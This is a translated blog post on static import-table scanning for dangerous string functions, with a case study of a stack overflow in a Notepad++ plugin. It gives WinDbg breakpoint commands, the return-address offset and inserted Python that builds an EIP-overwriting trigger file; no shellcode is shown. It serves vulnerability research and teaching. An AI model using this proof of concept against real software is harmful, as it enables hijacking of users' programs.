Title: Static scanning as a vulnerability-hunting method, plus a classic stack overflow example
Time: 2014-02-11,01:52:50
This is the second article I have written on vulnerability hunting, and almost a whole year separates it from the first. Work has been busy this year, but I still spent a lot of time on security, because my original goal was to go down the security road. I did a fair amount of security work over the year, including submitting findings to the various vendor SRC (security response center) programs. I kept that up for a while and then stopped, because it drifted away from my original idea of what "vulnerability" hunting means. Looking at what gets submitted there as "vulnerabilities" (I am only talking about PC-side products here; web vulnerabilities are outside the scope of this article), most of them are functional defects: some product's driver can be unloaded, a startup entry can be written, some antivirus can be killed, and so on. Those are flaws in a product, but this kind of functional-defect vulnerability, even with sophisticated adversarial techniques, takes discovery and exploitation completely out of the analysis of instruction execution at the binary level. The only thing you gain from that kind of hunting is a better familiarity with some small subsystem of the operating system; if you are someone who likes to summarize and map out what you have traced, you will study it "systematically", otherwise you end up like a martial artist who knows a few half-moves: you know that it works, but not why. Vulnerability hunting should return to its essence. As far as I know, the domestic companies doing real, pragmatic vulnerability hunting with many results to show for it are Jade Source and 360. Jade Source and Security Treasure grew up in a similar way, but the former leans towards host security and the latter towards web security. Having read some of the Rich Jade blog posts and the vulnerabilities Jade Source submitted to Microsoft, I think what they do is real vulnerability hunting.
Back to the topic of this article. The previous article covered fuzzing as a vulnerability-hunting method and introduced a local DoS vulnerability in Afd.sys on Windows XP. This article covers another method: static scanning for potentially dangerous functions. To make it more substantial, I also present a classic stack overflow I found using my own static scanner, including how the overflow was found, how it can be exploited, and the construction of the shellcode.
Part I: Static scanning methodology and tool development
There are many vulnerability-hunting methods: fuzzing, source auditing, binary code scanning, and so on. Fuzzing is a dynamic method, and every dynamic method needs fairly complete path coverage, which calls for a highly automated system and is expensive to build. Source auditing is comparatively simple to carry out, but it requires access to the source code, so third-party assessors usually cannot use it.
That leaves today's main character: binary code scanning. The idea is to scan the target program's binary files and, through PE file analysis, instruction analysis and the like, find potentially vulnerable code in the target. The most obvious variant is to scan the PE import table for dangerous functions. It is fast and reasonably effective, but it has a weakness: the detection rate is not high and things get missed, because only the import table is examined. If a module was linked against a static library, the dangerous function may be embedded directly inside the module and will not appear in the import table at all. Catching that requires instruction analysis, which is much harder and costlier to implement, since every vulnerability pattern has to be accounted for; that in turn leads to another drawback, very slow scanning.
An individual vulnerability researcher has neither the experience nor the time to build a systematic tool, but an import-table scan is comparatively easy. If you are not busy, you could open a program directory and go through the import tables one by one with Dependency Walker looking for the functions you consider dangerous, but who has the stamina for that... So I wrote a small tool, and BinCodeAudit was born.
BinCodeAudit is a tool written in Python for bulk scanning of import tables for potentially dangerous functions. Its originally planned structure was as follows:
[Figure 1: originally planned structure of BinCodeAudit]
Everything except the UI has now been implemented. Here is the code of the main program module in the current command-line mode:
Code:
#!/usr/bin/env python
# coding: utf-8
"""
Author:  tishion <[email protected]>
Purpose:
Created: 2014/2/9
"""
import os
import sys

from symscan import ImportSymScanner
from reportmaker import ReportMaker

g_str_help = """Usage: python bca <target-dir>
    target-dir : target directory path to be scanned.
    e.g.: python bca "C:\\windows\\system32"
"""


def main():
    # process command line arguments
    if len(sys.argv) <= 1:
        print('Syntax error: missing argument.')
        print(g_str_help)
        return
    target_dir = sys.argv[1]
    if not os.path.isdir(target_dir):
        print('Error: the target-dir:[' + target_dir + '] is not a directory!')
        return
    # create a scanner
    sc = ImportSymScanner()
    # add the target functions to scan for: (module, function names)
    sc.add_sym('msvcr90.dll', ('wcscpy', 'strcpy', 'swprintf'))
    sc.add_sym('msvcr80.dll', ('wcscpy', 'strcpy', 'swprintf'))
    sc.add_sym('msvcrt.dll', ('wcscpy', 'strcpy', 'swprintf'))
    sc.add_sym('kernel32.dll', ('lstrcpyA', 'lstrcpyW', 'lstrcatA', 'lstrcatW'))
    # start scanning
    print('Scanning ...')
    rl = sc.do_check(target_dir)
    print('Scanning is done!')
    # generate the report
    rm = ReportMaker()
    print('Generating report ...')
    rm.GenerateNewReport(target_dir, rl)
    # open the report file
    print('Opening report ...')
    rm.OpenReport()


if __name__ == '__main__':
    main()
How to use:
Code:
f:\projects\python\bincodeaudit>bca.py "F:\Program Files (x86)\SysinternalsSuite"
Scanning ...
Scanning is done!
Generating report ...
Opening report ...
The generated report is an HTML file:
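The symscan module that bca.py imports is not shown on the page. As an added example (my code, not BinCodeAudit's own symscan), here is a stdlib-only import-table walk of the kind the tool performs: it parses the DOS and PE headers, follows the import data directory through the section table, and reports which of a list of dangerous functions each module imports. Because a real binary is needed as input, the block also constructs a minimal PE32 whose only section is an import table; that builder, the DANGEROUS_IMPORTS table (copied from the sc.add_sym calls above) and the module and function names used as input are assumptions for illustration. The caveat from the text applies unchanged: a function pulled in from a static library never shows up in this walk.

```python
"""Added example: a minimal PE import-table scanner. Not BinCodeAudit's symscan module."""
import struct

# Same targets as the page's sc.add_sym() calls; module and function names are lower-cased.
DANGEROUS_IMPORTS = {
    "msvcr90.dll": {"wcscpy", "strcpy", "swprintf"},
    "msvcr80.dll": {"wcscpy", "strcpy", "swprintf"},
    "msvcrt.dll": {"wcscpy", "strcpy", "swprintf"},
    "kernel32.dll": {"lstrcpya", "lstrcpyw", "lstrcata", "lstrcatw"},
}


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def _rva_to_off(rva, sections):
    """Map a relative virtual address to a file offset through the section table."""
    for vsize, vaddr, rsize, rptr in sections:
        if vaddr <= rva < vaddr + max(vsize, rsize):
            return rva - vaddr + rptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def parse_imports(data):
    """Return {module_name_lower: [imported function names]} for a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                  # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec, opt_size = struct.unpack_from("<H", data, pe + 6)[0], struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                                  # optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:      # PE32: 32-bit thunks, data directories at +96
        dd, thunk_fmt, ord_flag = 96, "<I", 1 << 31
    elif magic == 0x20B:    # PE32+: 64-bit thunks, data directories at +112
        dd, thunk_fmt, ord_flag = 112, "<Q", 1 << 63
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    imp_rva = struct.unpack_from("<I", data, opt + dd + 8)[0]     # directory entry 1 = imports
    # section headers follow the optional header: VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    sections = [struct.unpack_from("<IIII", data, pe + 24 + opt_size + i * 40 + 8) for i in range(nsec)]
    imports = {}
    if imp_rva == 0:
        return imports
    desc = _rva_to_off(imp_rva, sections)
    while True:             # IMAGE_IMPORT_DESCRIPTOR array, ended by an all-zero entry
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, desc)
        if name_rva == 0:
            break
        module = _cstr(data, _rva_to_off(name_rva, sections)).lower()
        thunk = _rva_to_off(oft or ft, sections)                   # prefer the unbound name table
        names = []
        while True:
            entry = struct.unpack_from(thunk_fmt, data, thunk)[0]
            if entry == 0:
                break
            if entry & ord_flag:                                   # import by ordinal
                names.append("#%d" % (entry & 0xFFFF))
            else:                                                  # 2-byte hint, then the name
                names.append(_cstr(data, _rva_to_off(entry, sections) + 2))
            thunk += struct.calcsize(thunk_fmt)
        imports.setdefault(module, []).extend(names)
        desc += 20
    return imports


def scan_dangerous(data, targets=DANGEROUS_IMPORTS):
    """Return sorted (module, function) pairs from `targets` that the image imports."""
    hits = []
    for module, funcs in parse_imports(data).items():
        wanted = targets.get(module, set())
        hits.extend((module, f) for f in funcs if f.lower() in wanted)
    return sorted(hits)


def build_sample_pe(imports):
    """Construct a minimal PE32 whose single section holds only an import table (constructed test input)."""
    sec_rva, sec_raw = 0x1000, 0x200
    body = bytearray((len(imports) + 1) * 20)     # descriptor array first, null-terminated
    descs = b""
    for module, funcs in imports.items():
        name_rva = sec_rva + len(body)
        body += module.encode() + b"\0"
        entry_rvas = []
        for f in funcs:
            body += b"\0" * (len(body) % 2)       # hint/name entries are word aligned
            entry_rvas.append(sec_rva + len(body))
            body += b"\0\0" + f.encode() + b"\0"
        body += b"\0" * (-len(body) % 4)
        table = b"".join(struct.pack("<I", r) for r in entry_rvas) + b"\0" * 4
        oft_rva, ft_rva = sec_rva + len(body), sec_rva + len(body) + len(table)
        body += table + table                     # OriginalFirstThunk and FirstThunk tables
        descs += struct.pack("<IIIII", oft_rva, 0, 0, name_rva, ft_rva)
    body[:len(descs)] = descs
    dos = bytearray(b"MZ".ljust(0x40, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)       # e_lfanew
    opt = bytearray(224)                          # PE32 optional header with 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<II", opt, 96 + 8, sec_rva, len(descs) + 20)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    sec = struct.pack("<8sIIIIIIHHI", b".idata", len(body), sec_rva, len(body), sec_raw, 0, 0, 0, 0, 0x40000040)
    return bytes((dos + b"PE\0\0" + coff + opt + sec).ljust(sec_raw, b"\0") + body)
```

Running scan_dangerous over the bytes of a real file gives the same kind of hit list as the report above; the walk reads the OriginalFirstThunk table when present, so it still reports names for modules whose FirstThunk table has already been bound.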
[Figure 2: HTML scan report generated by BinCodeAudit]
The project is now hosted in a public repository. Anyone interested is welcome to apply to join development and maintenance, and if you have a larger feature you would like to contribute, pull requests against my branch are welcome too.
GitHub address: https://github.com/tishion/BinCodeAudit
Part II: A static-scan case study and a classic stack overflow
The above briefly covered building the static scanning tool. Building tools is not the goal; using them to find more vulnerabilities is. Now that the knife is sharpened it has to be tried, so I chose Notepad++ as the example program.
First, scan the binary code and pick a target
Use our tool to scan every file in the whole installation directory to see whether any of the target functions is present. Here the target functions are the CRT functions strcpy and wcscpy, and lstrcpyA/W and lstrcatA/W from the kernel32 module. Run the scan and get the result report:
[Figure 3: BinCodeAudit report for the Notepad++ installation directory]
As you can see, there are quite a few dangerous functions that could lead to stack overflows. The main program imports only two of them; most of the rest are in Notepad++ plug-in modules, so it seems the code quality contributed by plug-in developers is not very high. Now pick a target: we take the lstrcpyW import of notepad++.exe as the target and begin the analysis.
Second, try static analysis of the call sites to find a trigger scenario
First, statically analyse notepad++.exe to see whether we can find a call to lstrcpyW whose source-string parameter is data we control. But... a first look in IDA shows that the function has far too many call sites, and static analysis would need too much manual effort:
[Figure 4: cross-references to lstrcpyW in IDA]
So this step is skipped. It is only one way of finding the problem, and since its cost is too high here there is no need to insist on it; when the opportunity arises I will pick an example where direct static analysis is the right way to find the vulnerability.
Third, debugging analysis to find the trigger scenario
Since static analysis does not work here, we debug directly. When debugging, keep three points in mind:
1. We are looking for a stack overflow.
2. The overflow may happen inside lstrcpyW.
3. We want to find calls to lstrcpyW whose source string we control.
With those three points clear, the way to get the debugger to find such a scenario is easy to think of: set a breakpoint on lstrcpyW and, at each hit, print the function's source string, so we can tell whether the data is controllable.
Open notepad++.exe, attach WinDbg to the process and set the breakpoint (at function entry esp+4 holds the destination pointer and esp+8 the source pointer, so du poi(@esp+8) dumps the source string as Unicode):
Code:
bp kernel32!lstrcpyW "du poi(@esp+8); g"
Then operate Notepad++ and watch the debugger output. This is fairly time-consuming and needs patience: click through every button in Notepad++ and you will eventually find what we are looking for. I will not describe the search in detail and go straight to one scenario: the Goto Identifier feature of the CCompletion plugin, shown below. With no text selected, using Plugins > CCompletion > Goto Identifier causes all the text in the current editing area to be selected and processed four times by lstrcpyW.
[Figure 5: WinDbg output of the four lstrcpyW calls triggered by Goto Identifier]
Having found this scenario, we confirm whether lstrcpyW can actually overflow the stack here: feed in very long data and see whether the program crashes.
[Figure 6: crash after feeding a very long string]
As can be seen, the program crashes after the second copy with an access violation exception, so we can now say that an overflow is likely, but we still need to dig into these two calls. Change the breakpoint into a conditional one that only breaks when the source string being copied is the string we entered:
Code:
bp kernel32!lstrcpyW ".if (poi(poi(@esp+8)) == 0x00420042) {kv 1;} .else {du poi(@esp+8); g;}"
Our test string is BBAAAA..., so we only need to check whether the first four bytes of the source string are 0x00420042 (the UTF-16 encoding of "BB"). Then reproduce the crash scenario from before. Since the crash happens after the second copy, we look at the stack after the second copy:
[Figure 7: stack after the second copy]
The stack has been overwritten with our data. A bit of prediction here: if this is a stack overflow, then at the next ret instruction the data on the stack will be popped into EIP, and that value should be 0x00410041 (the UTF-16 encoding of "AA"), after which the program would continue executing from 0x00410041. With that in mind, set a breakpoint at 0x00410041 and let the program run.
[Figure 8: breakpoint at 0x00410041 hit]
The program does end up at the breakpoint at 0x00410041, so it is now perfectly clear that the program has a stack overflow and that we have hijacked EIP. Next we calculate the offset within our data of the value that ended up in EIP, that is, the location on the stack where the calling function's return address is stored. Remember the destination address of the second string copy? Yes, 0x00135c7c, and the value of ESP is 0x1360b0, so we compute the difference:
Code:
0:000:x86> ? 0x1360b0-0x00135c7c
Evaluate expression: 1076 = 0x00000434
So the four-byte DWORD at offset 0x434 into the data we construct is the value we control in EIP. To verify this, save the file we just constructed, open it with WinHex, and edit the DWORD at file offset 0x434 (mind the byte order here):
[Figure 9: editing the DWORD at offset 0x434 in WinHex]
Save the file, use it to trigger the scenario again, and see whether EIP becomes 0x00414243 as expected:
[Figure 10: EIP = 0x00414243]
EIP is indeed our expected 0x00414243. OK, at this point the overflow is completely under our control, and this is a perfectly usable overflow. What remains is to write shellcode to exploit it.
Constructing this shellcode did not go very smoothly and it is rather long, so this article stops here; next time I will share the shellcode construction process in detail.
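The last three steps (compute the offset, patch the DWORD, confirm what lands in EIP) as one worked script. This is an added example, not the author's code: it repeats the offset arithmetic from the ESP and destination values quoted above, writes the trigger file, and emulates the lstrcpyW copy against a fake stack to show what a ret would pop from the overwritten slot. Assumptions not stated on the page: the file is saved as UTF-16LE without a BOM, so a file offset equals the byte offset inside the wide string that lstrcpyW copies (the article edits file offset 0x434 and observes 0x00414243, which is consistent with that; with a BOM the file offset is two bytes larger, and with an ANSI file the copied wide string is twice as long as the file); ESP_AT_BREAK and DEST_BUFFER are the values from the debugger session; the original return address planted in the fake stack is an arbitrary placeholder. The emulation also shows the caveat a practitioner hits next: lstrcpyW stops at the first 0x0000 code unit, so a value whose low 16 bits are zero can never be written into the slot.

```python
"""Added example: building and checking the overflow trigger file. Not code from the article."""
import struct

# Values read from the debugger session in the article (second lstrcpyW call).
ESP_AT_BREAK = 0x1360B0   # ESP at the lstrcpyW breakpoint
DEST_BUFFER = 0x135C7C    # destination buffer passed to lstrcpyW


def return_slot_offset(esp, dest):
    """Offset from the start of the copied data to the overwritten return-address slot."""
    if dest >= esp:
        raise ValueError("destination is not below ESP; the slot is not reached by this copy")
    return esp - dest


def build_trigger(offset, eip=None, total_wchars=0x400, marker="BB", filler="A"):
    """UTF-16LE file bytes: `marker`, then `filler`, with `eip` packed little-endian at `offset`.

    Assumption: the file is UTF-16LE without a BOM, so a file offset equals the byte
    offset inside the wide string lstrcpyW copies.
    """
    if offset % 2 or offset + 4 > total_wchars * 2:
        raise ValueError("offset must be even and lie inside the data")
    buf = bytearray((marker + filler * total_wchars)[:total_wchars].encode("utf-16-le"))
    if eip is not None:
        if eip & 0xFFFF == 0:   # a 0x0000 code unit ends the copy before the slot is fully written
            raise ValueError("EIP value has a NUL low code unit; lstrcpyW would stop early")
        struct.pack_into("<I", buf, offset, eip)   # 0x00414243 -> bytes 43 42 41 00
    return bytes(buf)


def lstrcpyw_sim(stack, dest_off, src):
    """Emulate lstrcpyW: copy 16-bit units into `stack` until (and including) a 0x0000 unit."""
    n = 0
    while True:
        unit = src[2 * n:2 * n + 2]
        stack[dest_off + 2 * n:dest_off + 2 * n + 2] = unit
        if unit == b"\0\0":
            return n          # characters copied, terminator excluded
        n += 1


def overwritten_return(file_bytes, offset, original=0x7C801234):
    """Run the copy against a fake stack and return what a ret would pop from the slot."""
    stack = bytearray(b"\xcc" * (len(file_bytes) + 0x10))
    struct.pack_into("<I", stack, offset, original)   # placeholder for the caller's real return address
    lstrcpyw_sim(stack, 0, file_bytes + b"\0\0")       # in memory the source string is NUL-terminated
    return struct.unpack_from("<I", stack, offset)[0]


if __name__ == "__main__":
    off = return_slot_offset(ESP_AT_BREAK, DEST_BUFFER)
    print(hex(off), hex(overwritten_return(build_trigger(off), off)))
    print(hex(overwritten_return(build_trigger(off, 0x00414243), off)))
```

Writing the result of build_trigger(0x434, 0x00414243) to a file and opening it in Notepad++ reproduces the patched-file step above; the check on the low code unit is the reason a return address chosen for the real exploit must not have zero in its low 16 bits.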